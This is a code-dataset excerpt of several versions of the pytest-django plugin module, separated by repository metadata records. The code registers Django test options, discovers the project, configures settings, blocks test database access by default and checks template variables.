        self._dbutil = dbutil
        if dbutil:
            # Remember the real wrapper so enable() can restore it.
            self._orig_wrapper = dbutil.CursorWrapper

    def _blocking_wrapper(*args, **kwargs):
        __tracebackhide__ = True
        __tracebackhide__  # Silence pyflakes
        pytest.fail('Database access not allowed, '
                    'use the "django_db" mark to enable')

    def enable(self):
        """Enable access to the django database"""
        if not self._dbutil:
            return
        self._dbutil.CursorWrapper = self._orig_wrapper

    def disable(self):
        """Block database access by installing the failing wrapper."""
        if not self._dbutil:
            return
        self._dbutil.CursorWrapper = self._blocking_wrapper

    def __enter__(self):
        self.enable()

    def __exit__(self, exc_type, exc_value, traceback):
        self.disable()
def validate_django_db(marker):
    """Validate the django_db marker and attach its `transaction` flag.

    Signature checking is performed by calling a stand-in function with
    the marker's args/kwargs, so misuse raises a TypeError.
    """
    def _signature(transaction=False):
        marker.transaction = transaction
    _signature(*marker.args, **marker.kwargs)
def validate_urls(marker):
    """Validate the urls marker and attach its `urls` value.

    Signature checking is performed by calling a stand-in function with
    the marker's args/kwargs, so misuse raises a TypeError.
    """
    def _signature(urls):
        marker.urls = urls
    _signature(*marker.args, **marker.kwargs)
| {
"repo_name": "blueyed/pytest_django",
"path": "pytest_django/plugin.py",
"copies": "1",
"size": "9091",
"license": "bsd-3-clause",
"hash": 8742814361490536000,
"line_mean": 32.4227941176,
"line_max": 79,
"alpha_frac": 0.6342536575,
"autogenerated": false,
"ratio": 4.20295885344429,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.533721251094429,
"avg_score": null,
"num_lines": null
} |
"""A py.test plugin which helps testing Django applications
This plugin handles creating and destroying the test environment and
test database and provides some useful text fixtures.
"""
import contextlib
import inspect
from functools import reduce
import os
import sys
import types
import py
import pytest
from .django_compat import is_django_unittest
from .fixtures import (_django_db_setup, _live_server_helper, admin_client,
admin_user, client, db, django_user_model,
django_username_field, live_server, rf, settings,
transactional_db)
from .lazy_django import django_settings_is_configured, skip_if_no_django
# Silence linters for imported fixtures.
(_django_db_setup, _live_server_helper, admin_client, admin_user, client, db,
django_user_model, django_username_field, live_server, rf, settings,
transactional_db)
SETTINGS_MODULE_ENV = 'DJANGO_SETTINGS_MODULE'
CONFIGURATION_ENV = 'DJANGO_CONFIGURATION'
INVALID_TEMPLATE_VARS_ENV = 'FAIL_INVALID_TEMPLATE_VARS'
# ############### pytest hooks ################
def pytest_addoption(parser):
    """Register pytest-django's command line options and ini settings."""
    group = parser.getgroup('django')
    group._addoption('--reuse-db',
                     action='store_true', dest='reuse_db', default=False,
                     help='Re-use the testing database if it already exists, '
                          'and do not remove it when the test finishes. This '
                          'option will be ignored when --no-db is given.')
    group._addoption('--create-db',
                     action='store_true', dest='create_db', default=False,
                     help='Re-create the database, even if it exists. This '
                          'option will be ignored if not --reuse-db is given.')
    group._addoption('--ds',
                     action='store', type='string', dest='ds', default=None,
                     help='Set DJANGO_SETTINGS_MODULE.')
    group._addoption('--dc',
                     action='store', type='string', dest='dc', default=None,
                     help='Set DJANGO_CONFIGURATION.')
    group._addoption('--nomigrations',
                     action='store_true', dest='nomigrations', default=False,
                     help='Disable Django 1.7 migrations on test setup')
    group._addoption('--no-force-no-debug',
                     action='store_true', dest='noforcenodebug', default=False,
                     help='Disable forcing DEBUG setting to False on test setup')
    parser.addini(CONFIGURATION_ENV,
                  'django-configurations class to use by pytest-django.')
    group._addoption('--liveserver', default=None,
                     help='Address and port for the live_server fixture.')
    parser.addini(SETTINGS_MODULE_ENV,
                  'Django settings module to use by pytest-django.')
    parser.addini('django_find_project',
                  'Automatically find and add a Django project to the '
                  'Python path.',
                  default=True)
    group._addoption('--fail-on-template-vars',
                     action='store_true', dest='itv', default=False,
                     help='Fail for invalid variables in templates.')
    parser.addini(INVALID_TEMPLATE_VARS_ENV,
                  'Fail for invalid variables in templates.',
                  default=False)
def _exists(path, ignore=EnvironmentError):
try:
return path.check()
except ignore:
return False
# User-facing status messages about the automatic Django project discovery
# (the manage.py search) performed at startup.
PROJECT_FOUND = ('pytest-django found a Django project in %s '
                 '(it contains manage.py) and added it to the Python path.\n'
                 'If this is wrong, add "django_find_project = false" to '
                 'pytest.ini and explicitly manage your Python path.')
PROJECT_NOT_FOUND = ('pytest-django could not find a Django project '
                     '(no manage.py file could be found). You must '
                     'explicitly add your Django project to the Python path '
                     'to have it picked up.')
PROJECT_SCAN_DISABLED = ('pytest-django did not search for Django '
                         'projects since it is disabled in the configuration '
                         '("django_find_project = false")')
@contextlib.contextmanager
def _handle_import_error(extra_message):
try:
yield
except ImportError as e:
django_msg = (e.args[0] + '\n\n') if e.args else ''
msg = django_msg + extra_message
raise ImportError(msg)
def _add_django_project_to_path(args):
    """Search upwards from the pytest path arguments for a manage.py and,
    when found, insert that project directory at the front of sys.path.

    Returns one of the PROJECT_* status messages for later display.
    """
    # Keep only path-like arguments; drop command line options.
    args = [x for x in args if not str(x).startswith("-")]
    if not args:
        # No paths given: search from the current directory.
        args = [py.path.local()]
    for arg in args:
        arg = py.path.local(arg)
        # Walk from `arg` up towards the filesystem root.
        for base in arg.parts(reverse=True):
            manage_py_try = base.join('manage.py')
            if _exists(manage_py_try):
                sys.path.insert(0, str(base))
                return PROJECT_FOUND % base
    return PROJECT_NOT_FOUND
def _setup_django():
    """Initialise Django, falling back to app loading on Django < 1.7."""
    import django
    setup = getattr(django, 'setup', None)
    if setup is not None:
        setup()
        return
    # Older Django has no setup(); importing the models populates the app
    # cache, emulating Django 1.7's django.setup().
    from django.db.models import get_models
    get_models()
def _parse_django_find_project_ini(x):
if x in (True, False):
return x
x = x.lower()
possible_values = {'true': True,
'false': False,
'1': True,
'0': False}
try:
return possible_values[x]
except KeyError:
raise ValueError('%s is not a valid value for django_find_project. '
'It must be one of %s.'
% (x, ', '.join(possible_values.keys())))
def pytest_load_initial_conftests(early_config, parser, args):
    """Early pytest hook: register markers, discover the Django project,
    export the Django environment variables and initialise Django.
    """
    # Register the marks
    early_config.addinivalue_line(
        'markers',
        'django_db(transaction=False): Mark the test as using '
        'the django test database. The *transaction* argument marks will '
        "allow you to use real transactions in the test like Django's "
        'TransactionTestCase.')
    early_config.addinivalue_line(
        'markers',
        'urls(modstr): Use a different URLconf for this test, similar to '
        'the `urls` attribute of Django `TestCase` objects. *modstr* is '
        'a string specifying the module of a URL config, e.g. '
        '"my_app.test_urls".')

    options = parser.parse_known_args(args)

    if options.version or options.help:
        # Nothing to configure for --version/--help invocations.
        return

    django_find_project = _parse_django_find_project_ini(
        early_config.getini('django_find_project'))

    if django_find_project:
        _django_project_scan_outcome = _add_django_project_to_path(args)
    else:
        _django_project_scan_outcome = PROJECT_SCAN_DISABLED

    # Configure FAIL_INVALID_TEMPLATE_VARS
    itv = (options.itv or
           os.environ.get(INVALID_TEMPLATE_VARS_ENV) in ['true', 'True', '1'] or
           early_config.getini(INVALID_TEMPLATE_VARS_ENV))

    if itv:
        os.environ[INVALID_TEMPLATE_VARS_ENV] = 'true'

    # Configure DJANGO_SETTINGS_MODULE: CLI beats environment beats ini.
    ds = (options.ds or
          os.environ.get(SETTINGS_MODULE_ENV) or
          early_config.getini(SETTINGS_MODULE_ENV))

    # Configure DJANGO_CONFIGURATION
    dc = (options.dc or
          os.environ.get(CONFIGURATION_ENV) or
          early_config.getini(CONFIGURATION_ENV))

    if ds:
        os.environ[SETTINGS_MODULE_ENV] = ds

        if dc:
            os.environ[CONFIGURATION_ENV] = dc

            # Install the django-configurations importer
            import configurations.importer
            configurations.importer.install()

        # Forcefully load django settings, throws ImportError or
        # ImproperlyConfigured if settings cannot be loaded.
        from django.conf import settings

        with _handle_import_error(_django_project_scan_outcome):
            settings.DATABASES

    _setup_django()
def pytest_runtest_setup(item):
    """Neutralise setUpClass/tearDownClass on Django unittest TestCases.

    The real class-level hooks are stashed on the class and invoked later
    by the _django_setup_unittest fixture, so they are replaced with
    no-ops here (only once per class, guarded by __real_setUpClass).
    """
    if django_settings_is_configured() and is_django_unittest(item):
        cls = item.cls
        if hasattr(cls, '__real_setUpClass'):
            # Already patched for this class.
            return
        cls.__real_setUpClass = cls.setUpClass
        cls.__real_tearDownClass = cls.tearDownClass
        # Bind no-op replacements to the class.
        cls.setUpClass = types.MethodType(lambda cls: None, cls)
        cls.tearDownClass = types.MethodType(lambda cls: None, cls)
@pytest.fixture(autouse=True, scope='session')
def _django_test_environment(request):
    """
    Ensure that Django is loaded and has its testing environment setup.

    XXX It is a little dodgy that this is an autouse fixture. Perhaps
    an email fixture should be requested in order to be able to
    use the Django email machinery just like you need to request a
    db fixture for access to the Django database, etc. But
    without duplicating a lot more of Django's test support code
    we need to follow this model.
    """
    if django_settings_is_configured():
        _setup_django()
        from django.conf import settings
        from .compat import setup_test_environment, teardown_test_environment
        # DEBUG is forced off unless --no-force-no-debug was given.
        if not request.config.getvalue('noforcenodebug'):
            settings.DEBUG = False
        setup_test_environment()
        request.addfinalizer(teardown_test_environment)
@pytest.fixture(autouse=True, scope='session')
def _django_cursor_wrapper(request):
    """The django cursor wrapper, internal to pytest-django.

    This will globally disable all database access. The object
    returned has a .enable() and a .disable() method which can be used
    to temporarily enable database access.

    Returns None when Django settings are not configured.
    """
    if not django_settings_is_configured():
        return None
    # util -> utils rename in Django 1.7
    try:
        import django.db.backends.utils
        utils_module = django.db.backends.utils
    except ImportError:
        import django.db.backends.util
        utils_module = django.db.backends.util
    manager = CursorManager(utils_module)
    # Block DB access by default; tests opt in via the django_db marker.
    manager.disable()
    # Reinstall the original wrapper when the session ends.
    request.addfinalizer(manager.restore)
    return manager
@pytest.fixture(autouse=True)
def _django_db_marker(request):
    """Implement the django_db marker, internal to pytest-django.
    This will dynamically request the ``db`` or ``transactional_db``
    fixtures as required by the django_db marker.
    """
    marker = request.keywords.get('django_db', None)
    if marker:
        # Parses marker.args/kwargs and sets marker.transaction.
        validate_django_db(marker)
        if marker.transaction:
            request.getfuncargvalue('transactional_db')
        else:
            request.getfuncargvalue('db')
@pytest.fixture(autouse=True, scope='class')
def _django_setup_unittest(request, _django_cursor_wrapper):
    """Setup a django unittest, internal to pytest-django."""
    if django_settings_is_configured() and is_django_unittest(request):
        # Make sure the test environment and database are ready first.
        request.getfuncargvalue('_django_test_environment')
        request.getfuncargvalue('_django_db_setup')
        # Allow DB access while running the stashed setUpClass
        # (pytest_runtest_setup replaced the originals with no-ops).
        _django_cursor_wrapper.enable()
        request.node.cls.__real_setUpClass()
        def teardown():
            request.node.cls.__real_tearDownClass()
            _django_cursor_wrapper.restore()
        request.addfinalizer(teardown)
@pytest.fixture(autouse=True, scope='function')
def _django_clear_outbox():
    """Clear the django outbox, internal to pytest-django."""
    if django_settings_is_configured():
        from django.core import mail
        # Fresh list per test so sent emails don't leak between tests.
        mail.outbox = []
@pytest.fixture(autouse=True, scope='function')
def _django_set_urlconf(request):
    """Apply the @pytest.mark.urls marker, internal to pytest-django."""
    marker = request.keywords.get('urls', None)
    if marker:
        skip_if_no_django()
        import django.conf
        from django.core.urlresolvers import clear_url_caches
        # Parses marker.args/kwargs and sets marker.urls.
        validate_urls(marker)
        original_urlconf = django.conf.settings.ROOT_URLCONF
        django.conf.settings.ROOT_URLCONF = marker.urls
        # Resolver caches are tied to the urlconf; drop them so the new
        # ROOT_URLCONF takes effect.
        clear_url_caches()
        def restore():
            django.conf.settings.ROOT_URLCONF = original_urlconf
            # NOTE(review): restore() does not call clear_url_caches()
            # again -- verify stale entries cannot leak into later tests.
        request.addfinalizer(restore)
@pytest.fixture(autouse=True, scope='session')
def _fail_for_invalid_template_variable(request):
    """Fixture that fails for invalid variables in templates.
    This fixture will fail each test that uses django template rendering
    should a template contain an invalid template variable.
    The fail message will include the name of the invalid variable and
    in most cases the template name.
    It does not raise an exception, but fails, as the stack trace doesn't
    offer any helpful information to debug.
    This behavior can be switched off using the marker:
    ``ignore_template_errors``
    """
    class InvalidVarException(object):
        """Custom handler for invalid strings in templates."""
        def __init__(self):
            # When True, __mod__ fails the test; the ignore_template_errors
            # marker flips this to False (see
            # _template_string_if_invalid_marker).
            self.fail = True
        def __contains__(self, key):
            """There is a test for '%s' in TEMPLATE_STRING_IF_INVALID."""
            # Pretend to contain '%s' so Django treats us as a format string
            # and calls __mod__ with the variable name.
            return key == '%s'
        def _get_template(self):
            """Walk the call stack to find the Template being rendered."""
            from django.template import Template
            stack = inspect.stack()
            # finding the ``render`` needle in the stack
            frame = reduce(
                lambda x, y: y[3] == 'render' and 'base.py' in y[1] and y or x,
                stack
            )
            # assert 0, stack
            frame = frame[0]
            # finding only the frame locals in all frame members
            f_locals = reduce(
                lambda x, y: y[0] == 'f_locals' and y or x,
                inspect.getmembers(frame)
            )[1]
            # ``django.template.base.Template``
            template = f_locals['self']
            if isinstance(template, Template):
                return template
        def __mod__(self, var):
            """Handle TEMPLATE_STRING_IF_INVALID % var."""
            template = self._get_template()
            if template:
                msg = "Undefined template variable '%s' in '%s'" % (var, template.name)
            else:
                msg = "Undefined template variable '%s'" % var
            if self.fail:
                pytest.fail(msg, pytrace=False)
            else:
                return msg
    if os.environ.get(INVALID_TEMPLATE_VARS_ENV, 'false') == 'true':
        if django_settings_is_configured():
            import django
            from django.conf import settings
            # Django >= 1.8 configures templates through settings.TEMPLATES;
            # older versions use TEMPLATE_STRING_IF_INVALID directly.
            if django.VERSION >= (1, 8) and settings.TEMPLATES:
                settings.TEMPLATES[0]['OPTIONS']['string_if_invalid'] = InvalidVarException()
            else:
                settings.TEMPLATE_STRING_IF_INVALID = InvalidVarException()
@pytest.fixture(autouse=True)
def _template_string_if_invalid_marker(request):
    """Apply the @pytest.mark.ignore_template_errors marker,
    internal to pytest-django."""
    marker = request.keywords.get('ignore_template_errors', None)
    if os.environ.get(INVALID_TEMPLATE_VARS_ENV, 'false') == 'true':
        if marker and django_settings_is_configured():
            import django
            from django.conf import settings
            # Flip the InvalidVarException installed by
            # _fail_for_invalid_template_variable into non-failing mode.
            if django.VERSION >= (1, 8) and settings.TEMPLATES:
                settings.TEMPLATES[0]['OPTIONS']['string_if_invalid'].fail = False
            else:
                settings.TEMPLATE_STRING_IF_INVALID.fail = False
# ############### Helper Functions ################
class CursorManager(object):
    """Manager for django.db.backends.util.CursorWrapper.
    This is the object returned by _django_cursor_wrapper.
    If created with None as django.db.backends.util the object is a
    no-op.
    """
    def __init__(self, dbutil):
        # Module whose CursorWrapper attribute gets swapped in/out.
        self._dbutil = dbutil
        # Stack of previously-active wrappers so enable/disable calls nest.
        self._history = []
        self._real_wrapper = dbutil.CursorWrapper
    def _save_active_wrapper(self):
        # Push the current wrapper so restore() can pop back to it.
        return self._history.append(self._dbutil.CursorWrapper)
    def _blocking_wrapper(*args, **kwargs):
        # Installed in place of CursorWrapper while DB access is disabled;
        # any attempt to create a cursor fails the test.
        __tracebackhide__ = True
        __tracebackhide__  # Silence pyflakes
        pytest.fail('Database access not allowed, '
                    'use the "django_db" mark to enable it.')
    def enable(self):
        """Enable access to the Django database."""
        self._save_active_wrapper()
        self._dbutil.CursorWrapper = self._real_wrapper
    def disable(self):
        """Disable access to the Django database."""
        self._save_active_wrapper()
        self._dbutil.CursorWrapper = self._blocking_wrapper
    def restore(self):
        # Reinstall whatever wrapper was active before the last
        # enable()/disable() call.
        self._dbutil.CursorWrapper = self._history.pop()
    def __enter__(self):
        # Context-manager form: enable on entry, restore on exit.
        self.enable()
    def __exit__(self, exc_type, exc_value, traceback):
        self.restore()
def validate_django_db(marker):
    """Validate the django_db marker.

    Checks the marker's call signature and stores the resulting
    ``transaction`` flag directly on the marker object.
    """
    def _signature(transaction=False):
        return transaction

    # A bad signature surfaces as a TypeError here, exactly as if the
    # marker had been a real function call.
    marker.transaction = _signature(*marker.args, **marker.kwargs)
def validate_urls(marker):
    """Validate the urls marker.

    Checks the marker's call signature and stores the resulting
    ``urls`` value directly on the marker object.
    """
    def _signature(urls):
        return urls

    # A bad signature surfaces as a TypeError here, exactly as if the
    # marker had been a real function call.
    marker.urls = _signature(*marker.args, **marker.kwargs)
| {
"repo_name": "pelme/pytest-django",
"path": "pytest_django/plugin.py",
"copies": "1",
"size": "17185",
"license": "bsd-3-clause",
"hash": 7000396604547846000,
"line_mean": 33.6471774194,
"line_max": 93,
"alpha_frac": 0.617107943,
"autogenerated": false,
"ratio": 4.225473321858864,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0001181268709085208,
"num_lines": 496
} |
"""A pytest plugin which helps testing Django applications
This plugin handles creating and destroying the test environment and
test database and provides some useful text fixtures.
"""
import contextlib
import inspect
from functools import reduce
import os
import sys
import types
import pytest
from .django_compat import is_django_unittest # noqa
from .fixtures import django_assert_num_queries # noqa
from .fixtures import django_assert_max_num_queries # noqa
from .fixtures import django_db_setup # noqa
from .fixtures import django_db_use_migrations # noqa
from .fixtures import django_db_keepdb # noqa
from .fixtures import django_db_createdb # noqa
from .fixtures import django_db_modify_db_settings # noqa
from .fixtures import django_db_modify_db_settings_parallel_suffix # noqa
from .fixtures import django_db_modify_db_settings_tox_suffix # noqa
from .fixtures import django_db_modify_db_settings_xdist_suffix # noqa
from .fixtures import _live_server_helper # noqa
from .fixtures import admin_client # noqa
from .fixtures import admin_user # noqa
from .fixtures import client # noqa
from .fixtures import db # noqa
from .fixtures import django_user_model # noqa
from .fixtures import django_username_field # noqa
from .fixtures import live_server # noqa
from .fixtures import django_db_reset_sequences # noqa
from .fixtures import rf # noqa
from .fixtures import settings # noqa
from .fixtures import transactional_db # noqa
from .lazy_django import django_settings_is_configured, skip_if_no_django
try:
import pathlib
except ImportError:
import pathlib2 as pathlib
# Environment variable names shared with Django and django-configurations.
SETTINGS_MODULE_ENV = "DJANGO_SETTINGS_MODULE"
CONFIGURATION_ENV = "DJANGO_CONFIGURATION"
INVALID_TEMPLATE_VARS_ENV = "FAIL_INVALID_TEMPLATE_VARS"
PY2 = sys.version_info[0] == 2
# pytest 4.2 handles unittest setup/teardown itself via wrapping fixtures.
_pytest_version_info = tuple(int(x) for x in pytest.__version__.split(".", 2)[:2])
_handle_unittest_methods = _pytest_version_info < (4, 2)
# Lines appended here are shown by pytest_report_header().
_report_header = []
# ############### pytest hooks ################
def pytest_addoption(parser):
    """Register pytest-django's command-line options and ini settings."""
    group = parser.getgroup("django")
    group.addoption(
        "--reuse-db",
        action="store_true",
        dest="reuse_db",
        default=False,
        help="Re-use the testing database if it already exists, "
        "and do not remove it when the test finishes.",
    )
    group.addoption(
        "--create-db",
        action="store_true",
        dest="create_db",
        default=False,
        help="Re-create the database, even if it exists. This "
        "option can be used to override --reuse-db.",
    )
    group.addoption(
        "--ds",
        action="store",
        type=str,
        dest="ds",
        default=None,
        help="Set DJANGO_SETTINGS_MODULE.",
    )
    group.addoption(
        "--dc",
        action="store",
        type=str,
        dest="dc",
        default=None,
        help="Set DJANGO_CONFIGURATION.",
    )
    group.addoption(
        "--nomigrations",
        "--no-migrations",
        action="store_true",
        dest="nomigrations",
        default=False,
        help="Disable Django migrations on test setup",
    )
    # --migrations shares dest="nomigrations" with the option above, so
    # whichever appears later on the command line wins.
    group.addoption(
        "--migrations",
        action="store_false",
        dest="nomigrations",
        default=False,
        help="Enable Django migrations on test setup",
    )
    parser.addini(
        CONFIGURATION_ENV, "django-configurations class to use by pytest-django."
    )
    group.addoption(
        "--liveserver",
        default=None,
        help="Address and port for the live_server fixture.",
    )
    parser.addini(
        SETTINGS_MODULE_ENV, "Django settings module to use by pytest-django."
    )
    parser.addini(
        "django_find_project",
        "Automatically find and add a Django project to the " "Python path.",
        type="bool",
        default=True,
    )
    group.addoption(
        "--fail-on-template-vars",
        action="store_true",
        dest="itv",
        default=False,
        help="Fail for invalid variables in templates.",
    )
    parser.addini(
        INVALID_TEMPLATE_VARS_ENV,
        "Fail for invalid variables in templates.",
        type="bool",
        default=False,
    )
# User-facing messages produced by the manage.py project scan
# (_add_django_project_to_path); pytest_load_initial_conftests attaches
# the chosen one to any settings ImportError.
PROJECT_FOUND = (
    "pytest-django found a Django project in %s "
    "(it contains manage.py) and added it to the Python path.\n"
    'If this is wrong, add "django_find_project = false" to '
    "pytest.ini and explicitly manage your Python path."
)
PROJECT_NOT_FOUND = (
    "pytest-django could not find a Django project "
    "(no manage.py file could be found). You must "
    "explicitly add your Django project to the Python path "
    "to have it picked up."
)
PROJECT_SCAN_DISABLED = (
    "pytest-django did not search for Django "
    "projects since it is disabled in the configuration "
    '("django_find_project = false")'
)
@contextlib.contextmanager
def _handle_import_error(extra_message):
try:
yield
except ImportError as e:
django_msg = (e.args[0] + "\n\n") if e.args else ""
msg = django_msg + extra_message
raise ImportError(msg)
def _add_django_project_to_path(args):
    """Search *args* (plus the current directory) for a Django project.

    A project is a directory that directly contains ``manage.py``.  The
    first match -- checking each argument itself, then its ancestors --
    is prepended to ``sys.path``.  Returns one of the PROJECT_* messages
    describing the outcome.
    """
    def _looks_like_project(candidate):
        try:
            return candidate.is_dir() and (candidate / "manage.py").exists()
        except OSError:
            return False

    def _to_path(raw):
        # Strip any trailing ``::TestClass::test_name`` node-id suffix.
        return pathlib.Path(raw.split("::", 1)[0])

    candidates = [_to_path(str(a)) for a in args if not str(a).startswith("-")]
    cwd = pathlib.Path.cwd()
    # Always also consider the current working directory (covers the
    # no-arguments case as well).
    if cwd not in candidates:
        candidates.append(cwd)

    project_dir = None
    for candidate in candidates:
        for probe in (candidate,) + tuple(candidate.parents):
            if _looks_like_project(probe):
                project_dir = probe
                break
        if project_dir is not None:
            break

    if project_dir is None:
        return PROJECT_NOT_FOUND
    sys.path.insert(0, str(project_dir.absolute()))
    return PROJECT_FOUND % project_dir
def _setup_django():
    """Populate Django's app registry (if needed) and block DB access.

    Bails out early unless django is already imported and its settings are
    configured.  Note that _blocking_manager.block() runs on every call,
    pushing the previously-active wrapper onto the blocker's history.
    """
    if "django" not in sys.modules:
        return
    import django.conf
    # Avoid force-loading Django when settings are not properly configured.
    if not django.conf.settings.configured:
        return
    import django.apps
    if not django.apps.apps.ready:
        django.setup()
    # Database access stays blocked until a db fixture unblocks it.
    _blocking_manager.block()
def _get_boolean_value(x, name, default=None):
if x is None:
return default
if x in (True, False):
return x
possible_values = {"true": True, "false": False, "1": True, "0": False}
try:
return possible_values[x.lower()]
except KeyError:
raise ValueError(
"{} is not a valid value for {}. "
"It must be one of {}.".format(x, name, ", ".join(possible_values.keys()))
)
def pytest_load_initial_conftests(early_config, parser, args):
    """Early pytest hook: register markers, find the Django project and
    configure DJANGO_SETTINGS_MODULE / DJANGO_CONFIGURATION.

    Precedence for settings/configuration values: command-line option,
    then environment variable, then ini file (see _get_option_with_source).
    """
    # Register the marks
    early_config.addinivalue_line(
        "markers",
        "django_db(transaction=False): Mark the test as using "
        "the Django test database. The *transaction* argument marks will "
        "allow you to use real transactions in the test like Django's "
        "TransactionTestCase.",
    )
    early_config.addinivalue_line(
        "markers",
        "urls(modstr): Use a different URLconf for this test, similar to "
        "the `urls` attribute of Django's `TestCase` objects. *modstr* is "
        "a string specifying the module of a URL config, e.g. "
        '"my_app.test_urls".',
    )
    early_config.addinivalue_line(
        "markers",
        "ignore_template_errors(): ignore errors from invalid template "
        "variables (if --fail-on-template-vars is used).",
    )
    options = parser.parse_known_args(args)
    # --version / --help runs never need Django configured.
    if options.version or options.help:
        return
    django_find_project = _get_boolean_value(
        early_config.getini("django_find_project"), "django_find_project"
    )
    if django_find_project:
        _django_project_scan_outcome = _add_django_project_to_path(args)
    else:
        _django_project_scan_outcome = PROJECT_SCAN_DISABLED
    # Any of option / env / ini can turn on template-variable failures;
    # the result is normalized into the environment variable.
    if (
        options.itv
        or _get_boolean_value(
            os.environ.get(INVALID_TEMPLATE_VARS_ENV), INVALID_TEMPLATE_VARS_ENV
        )
        or early_config.getini(INVALID_TEMPLATE_VARS_ENV)
    ):
        os.environ[INVALID_TEMPLATE_VARS_ENV] = "true"
    def _get_option_with_source(option, envname):
        # Returns (value, source-label) for the report header.
        if option:
            return option, "option"
        if envname in os.environ:
            return os.environ[envname], "env"
        cfgval = early_config.getini(envname)
        if cfgval:
            return cfgval, "ini"
        return None, None
    ds, ds_source = _get_option_with_source(options.ds, SETTINGS_MODULE_ENV)
    dc, dc_source = _get_option_with_source(options.dc, CONFIGURATION_ENV)
    if ds:
        _report_header.append("settings: %s (from %s)" % (ds, ds_source))
        os.environ[SETTINGS_MODULE_ENV] = ds
    if dc:
        _report_header.append("configuration: %s (from %s)" % (dc, dc_source))
        os.environ[CONFIGURATION_ENV] = dc
        # Install the django-configurations importer
        import configurations.importer
        configurations.importer.install()
    # Forcefully load Django settings, throws ImportError or
    # ImproperlyConfigured if settings cannot be loaded.
    from django.conf import settings as dj_settings
    with _handle_import_error(_django_project_scan_outcome):
        dj_settings.DATABASES
    _setup_django()
def pytest_report_header():
    """Add the collected django settings/configuration info to pytest's
    report header, when any was recorded."""
    if not _report_header:
        return None
    return ["django: " + ", ".join(_report_header)]
@pytest.mark.trylast
def pytest_configure():
    """Finish Django initialization after user conftests ran (trylast)."""
    # Allow Django settings to be configured in a user pytest_configure call,
    # but make sure we call django.setup()
    _setup_django()
def _classmethod_is_defined_at_leaf(cls, method_name):
    """Return True when *cls* itself (not a base class) defines *method_name*.

    Fails the test if the attribute is not actually a classmethod.
    """
    super_method = None
    # Find the nearest base-class definition to compare against.
    for base_cls in cls.__mro__[1:]:  # pragma: no branch
        super_method = base_cls.__dict__.get(method_name)
        if super_method is not None:
            break
    assert super_method is not None, (
        "%s could not be found in base classes" % method_name
    )
    method = getattr(cls, method_name)
    try:
        f = method.__func__
    except AttributeError:
        pytest.fail("%s.%s should be a classmethod" % (cls, method_name))
    # On Python 2 a classmethod access yields a bound method whose
    # __self__ is the class; anything else is not a classmethod.
    if PY2 and not (
        inspect.ismethod(method)
        and inspect.isclass(method.__self__)
        and issubclass(cls, method.__self__)
    ):
        pytest.fail("%s.%s should be a classmethod" % (cls, method_name))
    # Identical underlying functions mean the leaf merely inherits it.
    return f is not super_method.__func__
# Per-class stash of (setUpClass, defined-at-leaf, tearDownClass,
# defined-at-leaf) used by _disable_class_methods/_restore_class_methods.
_disabled_classmethods = {}
def _disable_class_methods(cls):
    """Replace *cls*'s setUpClass/tearDownClass with no-ops (idempotent)."""
    if cls in _disabled_classmethods:
        return
    _disabled_classmethods[cls] = (
        # Get the classmethod object (not the resulting bound method),
        # otherwise inheritance will be broken when restoring.
        cls.__dict__.get("setUpClass"),
        _classmethod_is_defined_at_leaf(cls, "setUpClass"),
        cls.__dict__.get("tearDownClass"),
        _classmethod_is_defined_at_leaf(cls, "tearDownClass"),
    )
    cls.setUpClass = types.MethodType(lambda cls: None, cls)
    cls.tearDownClass = types.MethodType(lambda cls: None, cls)
def _restore_class_methods(cls):
    """Undo _disable_class_methods for *cls*."""
    (
        setUpClass,
        restore_setUpClass,
        tearDownClass,
        restore_tearDownClass,
    ) = _disabled_classmethods.pop(cls)
    try:
        del cls.setUpClass
    except AttributeError:
        # NOTE(review): a missing setUpClass re-raises here while the
        # tearDownClass case below is silently ignored -- verify this
        # asymmetry is intentional.
        raise
    try:
        del cls.tearDownClass
    except AttributeError:
        pass
    # Only re-attach methods that were defined on the leaf class itself;
    # inherited ones come back automatically once the no-op is deleted.
    if restore_setUpClass:
        cls.setUpClass = setUpClass
    if restore_tearDownClass:
        cls.tearDownClass = tearDownClass
def pytest_runtest_setup(item):
    """Disable unittest class setup/teardown on old pytest versions.

    Only needed when pytest itself does not wrap unittest setup/teardown
    in fixtures (pytest < 4.2, see _handle_unittest_methods).
    """
    if _handle_unittest_methods:
        if django_settings_is_configured() and is_django_unittest(item):
            _disable_class_methods(item.cls)
@pytest.hookimpl(tryfirst=True)
def pytest_collection_modifyitems(items):
    """Group tests by database usage mode.

    Order: 0 = TestCase / non-transactional db, 1 = TransactionTestCase /
    transactional db, 2 = no detected database usage.  The sort is stable,
    so the original order is kept inside each group.
    """
    # If Django is not configured we don't need to bother
    if not django_settings_is_configured():
        return
    from django.test import TestCase, TransactionTestCase
    def get_order_number(test):
        if hasattr(test, "cls") and test.cls:
            # Beware, TestCase is a subclass of TransactionTestCase
            if issubclass(test.cls, TestCase):
                return 0
            if issubclass(test.cls, TransactionTestCase):
                return 1
        marker_db = test.get_closest_marker('django_db')
        if marker_db:
            # First element of the validated tuple is the transaction flag.
            transaction = validate_django_db(marker_db)[0]
            if transaction is True:
                return 1
        else:
            transaction = None
        fixtures = getattr(test, 'fixturenames', [])
        if "transactional_db" in fixtures:
            return 1
        if transaction is False:
            return 0
        if "db" in fixtures:
            return 0
        return 2
    items[:] = sorted(items, key=get_order_number)
@pytest.fixture(autouse=True, scope="session")
def django_test_environment(request):
    """
    Ensure that Django is loaded and has its testing environment setup.
    XXX It is a little dodgy that this is an autouse fixture. Perhaps
    an email fixture should be requested in order to be able to
    use the Django email machinery just like you need to request a
    db fixture for access to the Django database, etc. But
    without duplicating a lot more of Django's test support code
    we need to follow this model.
    """
    if django_settings_is_configured():
        _setup_django()
        from django.conf import settings as dj_settings
        from django.test.utils import setup_test_environment, teardown_test_environment
        # Mirror Django's own test runner: tests always run with DEBUG off.
        dj_settings.DEBUG = False
        setup_test_environment()
        request.addfinalizer(teardown_test_environment)
@pytest.fixture(scope="session")
def django_db_blocker():
    """Wrapper around Django's database access.
    This object can be used to re-enable database access. This fixture is used
    internally in pytest-django to build the other fixtures and can be used for
    special database handling.
    The object is a context manager and provides the methods
    .unblock()/.block() and .restore() to temporarily enable database access.
    This is an advanced feature that is meant to be used to implement database
    fixtures.
    """
    if not django_settings_is_configured():
        return None
    # A single module-level blocker is shared by all users of this fixture.
    return _blocking_manager
@pytest.fixture(autouse=True)
def _django_db_marker(request):
